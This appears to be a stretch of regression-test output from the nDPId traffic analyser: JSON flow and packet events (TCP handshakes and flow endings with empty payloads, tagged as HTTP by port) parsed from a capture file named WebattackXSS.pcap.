+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347202722,"flow_last_seen":1499347202722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347202722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1499347202722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347202722,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83mxAAD4G52OsEAABwKgKMtWgAFD5fxMfAAAAAKACchCtxwAAAgQFtAQCCAoBOc1zAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1499347202722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347202722,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1aA8zHVU+X8TIKAScSBZuAAAAgQFtAQCCAoD457qATnNcwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":3,"flow_last_seen":1499347202722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347202722,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03m1AAD4G52qsEAABwKgKMtWgAFD5fxMgPMx1VYAQAOX4vwAAAQEICgE5zXMD457q"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347205214,"flow_last_seen":1499347205214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347205214,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1499347205214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347205214,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZeBAAD4GX\/CsEAABwKgKMtW6AFAegaoCAAAAAKACchDvWQAAAgQFtAQCCAoBOc\/iAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1983,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":1499347205214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347205214,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1bp74sNGHoGqA6AScSAL0wAAAgQFtAQCCAoD46FZATnP4gEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1499347205215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347205215,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZeFAAD4GX\/esEAABwKgKMtW6AFAegaoDe+LDR4AQAOWq2QAAAQEICgE5z+MD46FZ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347206497,"flow_last_seen":1499347206497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347206497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1499347206497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347206497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA85d9AAD4G3\/CsEAABwKgKMtXIAFBJFTT8AAAAAKACchA4fQAAAgQFtAQCCAoBOdEjAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1499347206497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347206497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1cindk\/NSRU0\/aAScSCbmwAAAgQFtAQCCAoD46KZATnRIwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1499347206498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347206498,"pkt":"ABm5CmnxAMGxFOsxCABFAAA05eBAAD4G3\/esEAABwKgKMtXIAFBJFTT9p3ZPzoAQAOU6owAAAQEICgE50SMD46KZ"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347207764,"flow_last_seen":1499347207764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347207764,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1499347207764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347207764,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oEFAAD4GJY+sEAABwKgKMtXWAFBZgnIhAAAAAKACchDpnwAAAgQFtAQCCAoBOdJgAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2007,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1499347207764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347207764,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1dboCFwKWYJyIqAScSD+sQAAAgQFtAQCCAoD46PWATnSYAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2008,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1499347207765,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347207765,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oEJAAD4GJZasEAABwKgKMtXWAFBZgnIi6AhcC4AQAOWduQAAAQEICgE50mAD46PW"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347210270,"flow_last_seen":1499347210270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347210270,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1499347210270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347210270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H3tAAD4GplWsEAABwKgKMtXwAFCR7supAAAAAKACchBVHwAAAgQFtAQCCAoBOdTSAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2025,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1499347210270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347210270,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1fCjgnLike7LqqAScSCVbAAAAgQFtAQCCAoD46ZJATnU0gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2026,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1499347210270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347210270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H3xAAD4GplysEAABwKgKMtXwAFCR7suqo4Jy44AQAOU0dAAAAQEICgE51NID46ZJ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2037,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347211522,"flow_last_seen":1499347211522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211522,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1499347211522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347211522,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86VZAAD4G3HmsEAABwKgKMtX+AFCmKj9dAAAAAKACchDL6AAAAgQFtAQCCAoBOdYLAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2038,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1499347211522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347211522,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1f624YVgpio\/XqAScSDlHwAAAgQFtAQCCAoD46eCATnWCwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2039,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1499347211523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347211523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06VdAAD4G3ICsEAABwKgKMtX+AFCmKj9etuGFYYAQAOWEJgAAAQEICgE51gwD46eC"} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347214088,"flow_last_seen":1499347214088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347214088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1499347214088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347214088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KIZAAD4GnUqsEAABwKgKMtYYAFAozfALAAAAAKACchCV+wAAAgQFtAQCCAoBOdiNAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1499347214089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347214089,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1hgNeWHdKM3wDKAScSB5nQAAAgQFtAQCCAoD46oDATnYjQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":3,"flow_last_seen":1499347214089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347214089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KIdAAD4GnVGsEAABwKgKMtYYAFAozfAMDXlh3oAQAOUYpQAAAQEICgE52I0D46oD"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347215361,"flow_last_seen":1499347215361,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347215361,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1499347215361,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347215361,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dFpAAD4GUXasEAABwKgKMtYmAFDVm62RAAAAAKACchAqWwAAAgQFtAQCCAoBOdnLAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2067,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1499347215361,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347215361,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1iYsMlMv1ZutkqAScSD8swAAAgQFtAQCCAoD46tBATnZywEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2068,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1499347215362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347215362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dFtAAD4GUX2sEAABwKgKMtYmAFDVm62SLDJTMIAQAOWbuwAAAQEICgE52csD46tB"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2078,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347216659,"flow_last_seen":1499347216659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347216659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
